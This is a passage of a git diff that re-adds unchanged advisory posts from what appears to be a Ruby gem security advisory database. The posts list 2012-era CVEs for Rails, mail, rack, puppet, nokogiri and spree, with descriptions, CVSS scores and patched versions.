+    in the select helper in Ruby on Rails 3.0.x before 3.0.12, 3.1.x before 3.1.4, and
+    3.2.x before 3.2.2 allows remote attackers to inject arbitrary web script or HTML
+    via vectors involving certain generation of OPTION elements within SELECT elements.
+  cvss_v2: 4.3
+  patched_versions:
+  - "~> 3.0.12"
+  - "~> 3.1.4"
+  - ">= 3.2.2"
+---
diff --git a/advisories/_posts/2012-03-14-CVE-2012-2139.md b/advisories/_posts/2012-03-14-CVE-2012-2139.md
index 07f90098..19621657 100644
--- a/advisories/_posts/2012-03-14-CVE-2012-2139.md
+++ b/advisories/_posts/2012-03-14-CVE-2012-2139.md
@@ -1,22 +1,22 @@
----
-layout: advisory
-title: 'CVE-2012-2139 (mail): CVE-2012-2139 rubygem-mail: directory traversal'
-comments: false
-categories:
-- mail
-advisory:
-  gem: mail
-  cve: 2012-2139
-  osvdb: 81631
-  ghsa: cj92-c4fj-w9c5
-  url: https://nvd.nist.gov/vuln/detail/CVE-2012-2139
-  title: 'CVE-2012-2139 rubygem-mail: directory traversal'
-  date: 2012-03-14
-  description: |
-    Directory traversal vulnerability in lib/mail/network/delivery_methods/file_delivery.rb
-    in the Mail gem before 2.4.4 for Ruby allows remote attackers to read arbitrary
-    files via a .. (dot dot) in the to parameter.
-  cvss_v2: 5.0
-  patched_versions:
-  - ">= 2.4.4"
----
+---
+layout: advisory
+title: 'CVE-2012-2139 (mail): CVE-2012-2139 rubygem-mail: directory traversal'
+comments: false
+categories:
+- mail
+advisory:
+  gem: mail
+  cve: 2012-2139
+  osvdb: 81631
+  ghsa: cj92-c4fj-w9c5
+  url: https://nvd.nist.gov/vuln/detail/CVE-2012-2139
+  title: 'CVE-2012-2139 rubygem-mail: directory traversal'
+  date: 2012-03-14
+  description: |
+    Directory traversal vulnerability in lib/mail/network/delivery_methods/file_delivery.rb
+    in the Mail gem before 2.4.4 for Ruby allows remote attackers to read arbitrary
+    files via a .. (dot dot) in the to parameter.
+  cvss_v2: 5.0
+  patched_versions:
+  - ">= 2.4.4"
+---
diff --git a/advisories/_posts/2012-03-14-CVE-2012-2140.md b/advisories/_posts/2012-03-14-CVE-2012-2140.md
index 46c71191..dd196cda 100644
--- a/advisories/_posts/2012-03-14-CVE-2012-2140.md
+++ b/advisories/_posts/2012-03-14-CVE-2012-2140.md
@@ -1,23 +1,23 @@
----
-layout: advisory
-title: 'CVE-2012-2140 (mail): CVE-2012-2140 rubygem-mail: arbitrary command execution
-  when using exim or sendmail from commandline'
-comments: false
-categories:
-- mail
-advisory:
-  gem: mail
-  cve: 2012-2140
-  osvdb: 81632
-  ghsa: rp63-jfmw-532w
-  url: https://nvd.nist.gov/vuln/detail/CVE-2012-2140
-  title: 'CVE-2012-2140 rubygem-mail: arbitrary command execution when using exim
-    or sendmail from commandline'
-  date: 2012-03-14
-  description: |
-    The Mail gem before 2.4.3 for Ruby allows remote attackers to execute
-    arbitrary commands via shell metacharacters in a (1) sendmail or (2) exim delivery.
-  cvss_v2: 7.5
-  patched_versions:
-  - ">= 2.4.4"
----
+---
+layout: advisory
+title: 'CVE-2012-2140 (mail): CVE-2012-2140 rubygem-mail: arbitrary command execution
+  when using exim or sendmail from commandline'
+comments: false
+categories:
+- mail
+advisory:
+  gem: mail
+  cve: 2012-2140
+  osvdb: 81632
+  ghsa: rp63-jfmw-532w
+  url: https://nvd.nist.gov/vuln/detail/CVE-2012-2140
+  title: 'CVE-2012-2140 rubygem-mail: arbitrary command execution when using exim
+    or sendmail from commandline'
+  date: 2012-03-14
+  description: |
+    The Mail gem before 2.4.3 for Ruby allows remote attackers to execute
+    arbitrary commands via shell metacharacters in a (1) sendmail or (2) exim delivery.
+  cvss_v2: 7.5
+  patched_versions:
+  - ">= 2.4.4"
+---
diff --git a/advisories/_posts/2012-04-20-CVE-2012-2126.md b/advisories/_posts/2012-04-20-CVE-2012-2126.md
index e49b030a..a3344ee4 100644
--- a/advisories/_posts/2012-04-20-CVE-2012-2126.md
+++ b/advisories/_posts/2012-04-20-CVE-2012-2126.md
@@ -1,24 +1,24 @@
----
-layout: advisory
-title: 'CVE-2012-2126 (rubygems-update): CVE-2012-2125 CVE-2012-2126 rubygems: Two
-  security fixes in v1.8.23'
-comments: false
-categories:
-- rubygems-update
-- rubygems
-advisory:
-  gem: rubygems-update
-  library: rubygems
-  cve: 2012-2126
-  osvdb: 81444
-  ghsa: 5mgj-mvv8-46mw
-  url: https://nvd.nist.gov/vuln/detail/CVE-2012-2126
-  title: 'CVE-2012-2125 CVE-2012-2126 rubygems: Two security fixes in v1.8.23'
-  date: 2012-04-20
-  description: |
-    RubyGems before 1.8.23 does not verify an SSL certificate, which allows
-    remote attackers to modify a gem during installation via a man-in-the-middle attack.
-  cvss_v2: 4.3
-  patched_versions:
-  - ">= 1.8.23"
----
+---
+layout: advisory
+title: 'CVE-2012-2126 (rubygems-update): CVE-2012-2125 CVE-2012-2126 rubygems: Two
+  security fixes in v1.8.23'
+comments: false
+categories:
+- rubygems-update
+- rubygems
+advisory:
+  gem: rubygems-update
+  library: rubygems
+  cve: 2012-2126
+  osvdb: 81444
+  ghsa: 5mgj-mvv8-46mw
+  url: https://nvd.nist.gov/vuln/detail/CVE-2012-2126
+  title: 'CVE-2012-2125 CVE-2012-2126 rubygems: Two security fixes in v1.8.23'
+  date: 2012-04-20
+  description: |
+    RubyGems before 1.8.23 does not verify an SSL certificate, which allows
+    remote attackers to modify a gem during installation via a man-in-the-middle attack.
+  cvss_v2: 4.3
+  patched_versions:
+  - ">= 1.8.23"
+---
diff --git a/advisories/_posts/2012-05-04-CVE-2012-6109.md b/advisories/_posts/2012-05-04-CVE-2012-6109.md
index 6909fa66..42b05001 100644
--- a/advisories/_posts/2012-05-04-CVE-2012-6109.md
+++ b/advisories/_posts/2012-05-04-CVE-2012-6109.md
@@ -1,27 +1,27 @@
----
-layout: advisory
-title: 'CVE-2012-6109 (rack): CVE-2012-6109 rubygem-rack: parsing Content-Disposition
-  header DoS'
-comments: false
-categories:
-- rack
-advisory:
-  gem: rack
-  cve: 2012-6109
-  osvdb: 89317
-  ghsa: h77x-m5q8-c29h
-  url: https://nvd.nist.gov/vuln/detail/CVE-2012-6109
-  title: 'CVE-2012-6109 rubygem-rack: parsing Content-Disposition header DoS'
-  date: 2012-05-04
-  description: |
-    lib/rack/multipart.rb in Rack before 1.1.4, 1.2.x before 1.2.6, 1.3.x
-    before 1.3.7, and 1.4.x before 1.4.2 uses an incorrect regular expression, which
-    allows remote attackers to cause a denial of service (infinite loop) via a crafted
-    Content-Disposion header.
-  cvss_v2: 4.3
-  patched_versions:
-  - "~> 1.1.4"
-  - "~> 1.2.6"
-  - "~> 1.3.7"
-  - ">= 1.4.2"
----
+---
+layout: advisory
+title: 'CVE-2012-6109 (rack): CVE-2012-6109 rubygem-rack: parsing Content-Disposition
+  header DoS'
+comments: false
+categories:
+- rack
+advisory:
+  gem: rack
+  cve: 2012-6109
+  osvdb: 89317
+  ghsa: h77x-m5q8-c29h
+  url: https://nvd.nist.gov/vuln/detail/CVE-2012-6109
+  title: 'CVE-2012-6109 rubygem-rack: parsing Content-Disposition header DoS'
+  date: 2012-05-04
+  description: |
+    lib/rack/multipart.rb in Rack before 1.1.4, 1.2.x before 1.2.6, 1.3.x
+    before 1.3.7, and 1.4.x before 1.4.2 uses an incorrect regular expression, which
+    allows remote attackers to cause a denial of service (infinite loop) via a crafted
+    Content-Disposion header.
+  cvss_v2: 4.3
+  patched_versions:
+  - "~> 1.1.4"
+  - "~> 1.2.6"
+  - "~> 1.3.7"
+  - ">= 1.4.2"
+---
diff --git a/advisories/_posts/2012-05-29-CVE-2012-1053.md b/advisories/_posts/2012-05-29-CVE-2012-1053.md
index c825aeae..10fb9395 100644
--- a/advisories/_posts/2012-05-29-CVE-2012-1053.md
+++ b/advisories/_posts/2012-05-29-CVE-2012-1053.md
@@ -1,44 +1,44 @@
----
-layout: advisory
-title: 'CVE-2012-1053 (puppet): Puppet Privilege Escallation'
-comments: false
-categories:
-- puppet
-advisory:
-  gem: puppet
-  cve: 2012-1053
-  ghsa: 77hg-g8cc-5r37
-  url: https://web.archive.org/web/20120504011717/http://puppetlabs.com/security/cve/cve-2012-1053
-  title: Puppet Privilege Escallation
-  date: 2012-05-29
-  description: |
-    The change_user method in the SUIDManager (lib/puppet/util/suidmanager.rb)
-    in Puppet 2.6.x before 2.6.14 and 2.7.x before 2.7.11, and Puppet Enterprise (PE)
-    Users 1.0, 1.1, 1.2.x, 2.0.x before 2.0.3 does not properly manage group privileges,
-    which allows local users to gain privileges via vectors related to (1) the change_user
-    not dropping supplementary groups in certain conditions, (2) changes to the eguid
-    without associated changes to the egid, or (3) the addition of the real gid to supplementary
-    groups.
-  cvss_v2: 6.5
-  unaffected_versions:
-  - "< 2.6"
-  patched_versions:
-  - "~> 2.6.14"
-  - ">= 2.7.11"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2012-1053
-    - https://exchange.xforce.ibmcloud.com/vulnerabilities/73445
-    - https://hermes.opensuse.org/messages/15087408
-    - https://github.com/puppetlabs/puppet/commit/76d0749f0a9a496b70e7dc7e6d6d6ff692224e36
-    - https://lists.opensuse.org/opensuse-security-announce/2012-03/msg00003.html
-    - https://ubuntu.com/usn/usn-1372-1
-    - https://web.archive.org/web/20120504011717/http://puppetlabs.com/security/cve/cve-2012-1053
-    - https://web.archive.org/web/20120513215447/http://projects.puppetlabs.com/issues/12458
-    - https://web.archive.org/web/20120513215653/http://projects.puppetlabs.com/issues/12457
-    - https://web.archive.org/web/20120513223437/http://projects.puppetlabs.com/issues/12459
-    - https://web.archive.org/web/20120527071855/http://www.securityfocus.com/bid/52158
-    - https://web.archive.org/web/20120816020421/http://projects.puppetlabs.com/projects/1/wiki/Release_Notes#2.6.14
-    - https://www.debian.org/security/2012/dsa-2419
-    - https://github.com/advisories/GHSA-77hg-g8cc-5r37
----
+---
+layout: advisory
+title: 'CVE-2012-1053 (puppet): Puppet Privilege Escallation'
+comments: false
+categories:
+- puppet
+advisory:
+  gem: puppet
+  cve: 2012-1053
+  ghsa: 77hg-g8cc-5r37
+  url: https://web.archive.org/web/20120504011717/http://puppetlabs.com/security/cve/cve-2012-1053
+  title: Puppet Privilege Escallation
+  date: 2012-05-29
+  description: |
+    The change_user method in the SUIDManager (lib/puppet/util/suidmanager.rb)
+    in Puppet 2.6.x before 2.6.14 and 2.7.x before 2.7.11, and Puppet Enterprise (PE)
+    Users 1.0, 1.1, 1.2.x, 2.0.x before 2.0.3 does not properly manage group privileges,
+    which allows local users to gain privileges via vectors related to (1) the change_user
+    not dropping supplementary groups in certain conditions, (2) changes to the eguid
+    without associated changes to the egid, or (3) the addition of the real gid to supplementary
+    groups.
+  cvss_v2: 6.5
+  unaffected_versions:
+  - "< 2.6"
+  patched_versions:
+  - "~> 2.6.14"
+  - ">= 2.7.11"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2012-1053
+    - https://exchange.xforce.ibmcloud.com/vulnerabilities/73445
+    - https://hermes.opensuse.org/messages/15087408
+    - https://github.com/puppetlabs/puppet/commit/76d0749f0a9a496b70e7dc7e6d6d6ff692224e36
+    - https://lists.opensuse.org/opensuse-security-announce/2012-03/msg00003.html
+    - https://ubuntu.com/usn/usn-1372-1
+    - https://web.archive.org/web/20120504011717/http://puppetlabs.com/security/cve/cve-2012-1053
+    - https://web.archive.org/web/20120513215447/http://projects.puppetlabs.com/issues/12458
+    - https://web.archive.org/web/20120513215653/http://projects.puppetlabs.com/issues/12457
+    - https://web.archive.org/web/20120513223437/http://projects.puppetlabs.com/issues/12459
+    - https://web.archive.org/web/20120527071855/http://www.securityfocus.com/bid/52158
+    - https://web.archive.org/web/20120816020421/http://projects.puppetlabs.com/projects/1/wiki/Release_Notes#2.6.14
+    - https://www.debian.org/security/2012/dsa-2419
+    - https://github.com/advisories/GHSA-77hg-g8cc-5r37
+---
diff --git a/advisories/_posts/2012-05-29-CVE-2012-1906.md b/advisories/_posts/2012-05-29-CVE-2012-1906.md
index bb2c4b79..bda10444 100644
--- a/advisories/_posts/2012-05-29-CVE-2012-1906.md
+++ b/advisories/_posts/2012-05-29-CVE-2012-1906.md
@@ -1,36 +1,36 @@
----
-layout: advisory
-title: 'CVE-2012-1906 (puppet): Puppet uses predictable filenames, allowing arbitrary
-  file overwrite'
-comments: false
-categories:
-- puppet
-advisory:
-  gem: puppet
-  cve: 2012-1906
-  ghsa: c4mc-49hq-q275
-  url: https://exchange.xforce.ibmcloud.com/vulnerabilities/74793
-  title: Puppet uses predictable filenames, allowing arbitrary file overwrite
-  date: 2012-05-29
-  description: |
-    Puppet 2.6.x before 2.6.15 and 2.7.x before 2.7.13, and Puppet Enterprise
-    (PE) Users 1.0, 1.1, 1.2.x, 2.0.x, and 2.5.x before 2.5.1 uses predictable file
-    names when installing Mac OS X packages from a remote source, which allows local
-    users to overwrite arbitrary files or install arbitrary packages via a symlink attack
-    on a temporary file in /tmp.
-  cvss_v2: 3.3
-  unaffected_versions:
-  - "< 2.6"
-  patched_versions:
-  - "~> 2.6.15"
-  - ">= 2.7.13"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2012-1906
-    - https://exchange.xforce.ibmcloud.com/vulnerabilities/74793
-    - https://github.com/puppetlabs/puppet/commit/f7829ec1f1b2c3def8e0eda09c22c3c1fed3a27f
-    - https://ubuntu.com/usn/usn-1419-1
-    - https://web.archive.org/web/20120415105345/http://www.securityfocus.com/bid/52975
-    - https://www.debian.org/security/2012/dsa-2451
-    - https://github.com/advisories/GHSA-c4mc-49hq-q275
----
+---
+layout: advisory
+title: 'CVE-2012-1906 (puppet): Puppet uses predictable filenames, allowing arbitrary
+  file overwrite'
+comments: false
+categories:
+- puppet
+advisory:
+  gem: puppet
+  cve: 2012-1906
+  ghsa: c4mc-49hq-q275
+  url: https://exchange.xforce.ibmcloud.com/vulnerabilities/74793
+  title: Puppet uses predictable filenames, allowing arbitrary file overwrite
+  date: 2012-05-29
+  description: |
+    Puppet 2.6.x before 2.6.15 and 2.7.x before 2.7.13, and Puppet Enterprise
+    (PE) Users 1.0, 1.1, 1.2.x, 2.0.x, and 2.5.x before 2.5.1 uses predictable file
+    names when installing Mac OS X packages from a remote source, which allows local
+    users to overwrite arbitrary files or install arbitrary packages via a symlink attack
+    on a temporary file in /tmp.
+  cvss_v2: 3.3
+  unaffected_versions:
+  - "< 2.6"
+  patched_versions:
+  - "~> 2.6.15"
+  - ">= 2.7.13"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2012-1906
+    - https://exchange.xforce.ibmcloud.com/vulnerabilities/74793
+    - https://github.com/puppetlabs/puppet/commit/f7829ec1f1b2c3def8e0eda09c22c3c1fed3a27f
+    - https://ubuntu.com/usn/usn-1419-1
+    - https://web.archive.org/web/20120415105345/http://www.securityfocus.com/bid/52975
+    - https://www.debian.org/security/2012/dsa-2451
+    - https://github.com/advisories/GHSA-c4mc-49hq-q275
+---
diff --git a/advisories/_posts/2012-05-31-CVE-2012-2660.md b/advisories/_posts/2012-05-31-CVE-2012-2660.md
index fbba268e..df45794b 100644
--- a/advisories/_posts/2012-05-31-CVE-2012-2660.md
+++ b/advisories/_posts/2012-05-31-CVE-2012-2660.md
@@ -1,29 +1,29 @@
----
-layout: advisory
-title: 'CVE-2012-2660 (activerecord): CVE-2012-2660 rubygem-actionpack: Unsafe query
-  generation'
-comments: false
-categories:
-- activerecord
-- rails
-advisory:
-  gem: activerecord
-  framework: rails
-  cve: 2012-2660
-  osvdb: 82610
-  url: https://nvd.nist.gov/vuln/detail/CVE-2012-2660
-  title: 'CVE-2012-2660 rubygem-actionpack: Unsafe query generation'
-  date: 2012-05-31
-  description: |
-    actionpack/lib/action_dispatch/http/request.rb in Ruby on Rails before
-    3.0.13, 3.1.x before 3.1.5, and 3.2.x before 3.2.4 does not properly consider differences
-    in parameter handling between the Active Record component and the Rack interface,
-    which allows remote attackers to bypass intended database-query restrictions and
-    perform NULL checks via a crafted request, as demonstrated by certain "[nil]" values,
-    a related issue to CVE-2012-2694.
-  cvss_v2: 7.5
-  patched_versions:
-  - "~> 3.0.13"
-  - "~> 3.1.5"
-  - ">= 3.2.4"
----
+---
+layout: advisory
+title: 'CVE-2012-2660 (activerecord): CVE-2012-2660 rubygem-actionpack: Unsafe query
+  generation'
+comments: false
+categories:
+- activerecord
+- rails
+advisory:
+  gem: activerecord
+  framework: rails
+  cve: 2012-2660
+  osvdb: 82610
+  url: https://nvd.nist.gov/vuln/detail/CVE-2012-2660
+  title: 'CVE-2012-2660 rubygem-actionpack: Unsafe query generation'
+  date: 2012-05-31
+  description: |
+    actionpack/lib/action_dispatch/http/request.rb in Ruby on Rails before
+    3.0.13, 3.1.x before 3.1.5, and 3.2.x before 3.2.4 does not properly consider differences
+    in parameter handling between the Active Record component and the Rack interface,
+    which allows remote attackers to bypass intended database-query restrictions and
+    perform NULL checks via a crafted request, as demonstrated by certain "[nil]" values,
+    a related issue to CVE-2012-2694.
+  cvss_v2: 7.5
+  patched_versions:
+  - "~> 3.0.13"
+  - "~> 3.1.5"
+  - ">= 3.2.4"
+---
diff --git a/advisories/_posts/2012-05-31-CVE-2012-2661.md b/advisories/_posts/2012-05-31-CVE-2012-2661.md
index 73cf139b..4f148901 100644
--- a/advisories/_posts/2012-05-31-CVE-2012-2661.md
+++ b/advisories/_posts/2012-05-31-CVE-2012-2661.md
@@ -1,32 +1,32 @@
----
-layout: advisory
-title: 'CVE-2012-2661 (activerecord): CVE-2012-2661 rubygem-activerecord: SQL injection
-  when processing nested query paramaters'
-comments: false
-categories:
-- activerecord
-- rails
-advisory:
-  gem: activerecord
-  framework: rails
-  cve: 2012-2661
-  osvdb: 82403
-  ghsa: fh39-v733-mxfr
-  url: https://nvd.nist.gov/vuln/detail/CVE-2012-2661
-  title: 'CVE-2012-2661 rubygem-activerecord: SQL injection when processing nested
-    query paramaters'
-  date: 2012-05-31
-  description: |
-    The Active Record component in Ruby on Rails 3.0.x before 3.0.13, 3.1.x
-    before 3.1.5, and 3.2.x before 3.2.4 does not properly implement the passing of
-    request data to a where method in an ActiveRecord class, which allows remote attackers
-    to conduct certain SQL injection attacks via nested query parameters that leverage
-    unintended recursion, a related issue to CVE-2012-2695.
-  cvss_v2: 5.0
-  unaffected_versions:
-  - "~> 2.3.14"
-  patched_versions:
-  - "~> 3.0.13"
-  - "~> 3.1.5"
-  - ">= 3.2.4"
----
+---
+layout: advisory
+title: 'CVE-2012-2661 (activerecord): CVE-2012-2661 rubygem-activerecord: SQL injection
+  when processing nested query paramaters'
+comments: false
+categories:
+- activerecord
+- rails
+advisory:
+  gem: activerecord
+  framework: rails
+  cve: 2012-2661
+  osvdb: 82403
+  ghsa: fh39-v733-mxfr
+  url: https://nvd.nist.gov/vuln/detail/CVE-2012-2661
+  title: 'CVE-2012-2661 rubygem-activerecord: SQL injection when processing nested
+    query paramaters'
+  date: 2012-05-31
+  description: |
+    The Active Record component in Ruby on Rails 3.0.x before 3.0.13, 3.1.x
+    before 3.1.5, and 3.2.x before 3.2.4 does not properly implement the passing of
+    request data to a where method in an ActiveRecord class, which allows remote attackers
+    to conduct certain SQL injection attacks via nested query parameters that leverage
+    unintended recursion, a related issue to CVE-2012-2695.
+  cvss_v2: 5.0
+  unaffected_versions:
+  - "~> 2.3.14"
+  patched_versions:
+  - "~> 3.0.13"
+  - "~> 3.1.5"
+  - ">= 3.2.4"
+---
diff --git a/advisories/_posts/2012-06-06-CVE-2012-2671.md b/advisories/_posts/2012-06-06-CVE-2012-2671.md
index 90421f01..7807483a 100644
--- a/advisories/_posts/2012-06-06-CVE-2012-2671.md
+++ b/advisories/_posts/2012-06-06-CVE-2012-2671.md
@@ -1,24 +1,24 @@
----
-layout: advisory
-title: 'CVE-2012-2671 (rack-cache): rack-cache Rubygem Sensitive HTTP Header Caching
-  Weakness'
-comments: false
-categories:
-- rack-cache
-advisory:
-  gem: rack-cache
-  cve: 2012-2671
-  osvdb: 83077
-  ghsa: hrp6-w4v2-8737
-  url: https://nvd.nist.gov/vuln/detail/CVE-2012-2671
-  title: rack-cache Rubygem Sensitive HTTP Header Caching Weakness
-  date: 2012-06-06
-  description: |
-    Rack::Cache (rack-cache) contains a flaw related to the rubygem caching
-    sensitive HTTP headers. This will result in a weakness that may make it
-    easier for an attacker to gain access to a user's session via a specially
-    crafted header.
-  cvss_v2: 7.5
-  patched_versions:
-  - ">= 1.2"
----
+---
+layout: advisory
+title: 'CVE-2012-2671 (rack-cache): rack-cache Rubygem Sensitive HTTP Header Caching
+  Weakness'
+comments: false
+categories:
+- rack-cache
+advisory:
+  gem: rack-cache
+  cve: 2012-2671
+  osvdb: 83077
+  ghsa: hrp6-w4v2-8737
+  url: https://nvd.nist.gov/vuln/detail/CVE-2012-2671
+  title: rack-cache Rubygem Sensitive HTTP Header Caching Weakness
+  date: 2012-06-06
+  description: |
+    Rack::Cache (rack-cache) contains a flaw related to the rubygem caching
+    sensitive HTTP headers. This will result in a weakness that may make it
+    easier for an attacker to gain access to a user's session via a specially
+    crafted header.
+  cvss_v2: 7.5
+  patched_versions:
+  - ">= 1.2"
+---
diff --git a/advisories/_posts/2012-06-08-CVE-2012-6685.md b/advisories/_posts/2012-06-08-CVE-2012-6685.md
index 743058e2..2e4a3222 100644
--- a/advisories/_posts/2012-06-08-CVE-2012-6685.md
+++ b/advisories/_posts/2012-06-08-CVE-2012-6685.md
@@ -1,23 +1,23 @@
----
-layout: advisory
-title: 'CVE-2012-6685 (nokogiri): CVE-2012-6685 rubygem-nokogiri: XML eXternal Entity
-  (XXE) flaw'
-comments: false
-categories:
-- nokogiri
-advisory:
-  gem: nokogiri
-  cve: 2012-6685
-  osvdb: 90946
-  ghsa: 6wj9-77wq-jq7p
-  url: https://nvd.nist.gov/vuln/detail/CVE-2012-6685
-  title: 'CVE-2012-6685 rubygem-nokogiri: XML eXternal Entity (XXE) flaw'
-  date: 2012-06-08
-  description: 'Nokogiri before 1.5.4 is vulnerable to XXE attacks
-
-    '
-  cvss_v2: 5.0
-  cvss_v3: 7.5
-  patched_versions:
-  - ">= 1.5.4"
----
+---
+layout: advisory
+title: 'CVE-2012-6685 (nokogiri): CVE-2012-6685 rubygem-nokogiri: XML eXternal Entity
+  (XXE) flaw'
+comments: false
+categories:
+- nokogiri
+advisory:
+  gem: nokogiri
+  cve: 2012-6685
+  osvdb: 90946
+  ghsa: 6wj9-77wq-jq7p
+  url: https://nvd.nist.gov/vuln/detail/CVE-2012-6685
+  title: 'CVE-2012-6685 rubygem-nokogiri: XML eXternal Entity (XXE) flaw'
+  date: 2012-06-08
+  description: 'Nokogiri before 1.5.4 is vulnerable to XXE attacks
+
+    '
+  cvss_v2: 5.0
+  cvss_v3: 7.5
+  patched_versions:
+  - ">= 1.5.4"
+---
diff --git a/advisories/_posts/2012-07-02-OSVDB-125712.md b/advisories/_posts/2012-07-02-OSVDB-125712.md
index eb59c787..5f5d033d 100644
--- a/advisories/_posts/2012-07-02-OSVDB-125712.md
+++ b/advisories/_posts/2012-07-02-OSVDB-125712.md
@@ -1,27 +1,27 @@
----
-layout: advisory
-title: 'OSVDB-125712 (spree): Product Scopes could allow for unauthenticated remote
-  command execution'
-comments: false
-categories:
-- spree
-advisory:
-  gem: spree
-  osvdb: 125712
-  url: https://web.archive.org/web/20121126005814/https://spreecommerce.com/blog/security-issue-all-versions
-  title: Product Scopes could allow for unauthenticated remote command execution
-  date: 2012-07-02
-  description: |
-    Product Scopes could allow for unauthenticated remote command execution.
-    This was corrected by removing conditions_any scope and use ARel query
-    building instead.
-  patched_versions:
-  - "~> 0.11.4"
-  - "~> 0.70.6"
-  - "~> 1.0.5"
-  - ">= 1.1.2"
-  related:
-    url:
-    - https://web.archive.org/web/20121126005814/https://spreecommerce.com/blog/security-issue-all-versions
-    - https://security.snyk.io/vuln/SNYK-RUBY-SPREE-20034
----
+---
+layout: advisory
+title: 'OSVDB-125712 (spree): Product Scopes could allow for unauthenticated remote
+  command execution'
+comments: false
+categories:
+- spree
+advisory:
+  gem: spree
+  osvdb: 125712
+  url: https://web.archive.org/web/20121126005814/https://spreecommerce.com/blog/security-issue-all-versions
+  title: Product Scopes could allow for unauthenticated remote command execution
+  date: 2012-07-02
+  description: |
+    Product Scopes could allow for unauthenticated remote command execution.
+    This was corrected by removing conditions_any scope and use ARel query
+    building instead.
+  patched_versions:
+  - "~> 0.11.4"
+  - "~> 0.70.6"
+  - "~> 1.0.5"
+  - ">= 1.1.2"
+  related:
+    url:
+    - https://web.archive.org/web/20121126005814/https://spreecommerce.com/blog/security-issue-all-versions
+    - https://security.snyk.io/vuln/SNYK-RUBY-SPREE-20034
+---
diff --git a/advisories/_posts/2012-07-02-OSVDB-125713.md b/advisories/_posts/2012-07-02-OSVDB-125713.md
index 602ef0d4..59155b75 100644
--- a/advisories/_posts/2012-07-02-OSVDB-125713.md
+++ b/advisories/_posts/2012-07-02-OSVDB-125713.md
@@ -1,25 +1,25 @@
----
-layout: advisory
-title: 'OSVDB-125713 (spree): Potential XSS vulnerability related to the analytics
-  dashboard'
-comments: false
-categories:
-- spree
-advisory:
-  gem: spree
-  osvdb: 125713
-  url: https://web.archive.org/web/20121126005814/https://spreecommerce.com/blog/security-issue-all-versions
-  title: Potential XSS vulnerability related to the analytics dashboard
-  date: 2012-07-02
-  description: |
-    Spree has a flaw in its analytics dashboard where
-    keywords are not escaped, leading to potential XSS.
-  patched_versions:
-  - "~> 0.11.4"
-  - "~> 0.70.6"
-  - "~> 1.0.5"
-  - ">= 1.1.2"
-  related:
-    url:
-    - https://web.archive.org/web/20121126005814/https://spreecommerce.com/blog/security-issue-all-versions
----
+---
+layout: advisory
+title: 'OSVDB-125713 (spree): Potential XSS vulnerability related to the analytics
+  dashboard'
+comments: false
+categories:
+- spree
+advisory:
+  gem: spree
+  osvdb: 125713
+  url: https://web.archive.org/web/20121126005814/https://spreecommerce.com/blog/security-issue-all-versions
+  title: Potential XSS vulnerability related to the analytics dashboard
+  date: 2012-07-02
+  description: |
+    Spree has a flaw in its analytics dashboard where
+    keywords are not escaped, leading to potential XSS.
+  patched_versions:
+  - "~> 0.11.4"
+  - "~> 0.70.6"
+  - "~> 1.0.5"
+  - ">= 1.1.2"
+  related:
+    url:
+    - https://web.archive.org/web/20121126005814/https://spreecommerce.com/blog/security-issue-all-versions
+---
diff --git a/advisories/_posts/2012-07-26-CVE-2012-3424.md b/advisories/_posts/2012-07-26-CVE-2012-3424.md
index 2de76573..4379064f 100644
--- a/advisories/_posts/2012-07-26-CVE-2012-3424.md
+++ b/advisories/_posts/2012-07-26-CVE-2012-3424.md
@@ -1,31 +1,31 @@
----
-layout: advisory
-title: 'CVE-2012-3424 (actionpack): CVE-2012-3424 rubygem-actionpack: DoS vulnerability
-  in authenticate_or_request_with_http_digest'
-comments: false
-categories:
-- actionpack
-- rails
-advisory:
-  gem: actionpack
-  framework: rails
-  cve: 2012-3424
-  osvdb: 84243
-  ghsa: 92w9-2pqw-rhjj
-  url: https://nvd.nist.gov/vuln/detail/CVE-2012-3424
-  title: 'CVE-2012-3424 rubygem-actionpack: DoS vulnerability in authenticate_or_request_with_http_digest'
-  date: 2012-07-26
-  description: |
-    The decode_credentials method in actionpack/lib/action_controller/metal/http_authentication.rb
-    in Ruby on Rails 3.x before 3.0.16, 3.1.x before 3.1.7, and 3.2.x before 3.2.7 converts
-    Digest Authentication strings to symbols, which allows remote attackers to cause
-    a denial of service by leveraging access to an application that uses a with_http_digest
-    helper method, as demonstrated by the authenticate_or_request_with_http_digest method.
-  cvss_v2: 5.0
-  unaffected_versions:
-  - ">= 2.3.5, <= 2.3.14"
-  patched_versions:
-  - "~> 3.0.16"
-  - "~> 3.1.7"
-  - ">= 3.2.7"
----
+---
+layout: advisory
+title: 'CVE-2012-3424 (actionpack): CVE-2012-3424 rubygem-actionpack: DoS vulnerability
+  in authenticate_or_request_with_http_digest'
+comments: false
+categories:
+- actionpack
+- rails
+advisory:
+  gem: actionpack
+  framework: rails
+  cve: 2012-3424
+  osvdb: 84243
+  ghsa: 92w9-2pqw-rhjj
+  url: https://nvd.nist.gov/vuln/detail/CVE-2012-3424
+  title: 'CVE-2012-3424 rubygem-actionpack: DoS vulnerability in authenticate_or_request_with_http_digest'
+  date: 2012-07-26
+  description: |
+    The decode_credentials method in actionpack/lib/action_controller/metal/http_authentication.rb
+    in Ruby on Rails 3.x before 3.0.16, 3.1.x before 3.1.7, and 3.2.x before 3.2.7 converts
+    Digest Authentication strings to symbols, which allows remote attackers to cause
+    a denial of service by leveraging access to an application that uses a with_http_digest
+    helper method, as demonstrated by the authenticate_or_request_with_http_digest method.
+  cvss_v2: 5.0
+  unaffected_versions:
+  - ">= 2.3.5, <= 2.3.14"
+  patched_versions:
+  - "~> 3.0.16"
+  - "~> 3.1.7"
+  - ">= 3.2.7"
+---
diff --git a/advisories/_posts/2012-08-08-CVE-2010-5142.md b/advisories/_posts/2012-08-08-CVE-2010-5142.md
index ab123a42..04afc135 100644
--- a/advisories/_posts/2012-08-08-CVE-2010-5142.md
+++ b/advisories/_posts/2012-08-08-CVE-2010-5142.md
@@ -1,29 +1,29 @@
----
-layout: advisory
-title: 'CVE-2010-5142 (chef): Chef Improper Access Control Vulnerability'
-comments: false
-categories:
-- chef
-advisory:
-  gem: chef
-  cve: 2010-5142
-  ghsa: f68m-q26r-64f6
-  url: https://github.com/advisories/GHSA-f68m-q26r-64f6
-  title: Chef Improper Access Control Vulnerability
-  date: 2012-08-08
-  description: |
-    `chef-server-api/app/controllers/users.rb` in the API in Chef before
-    0.9.0 does not require administrative privileges for the create,
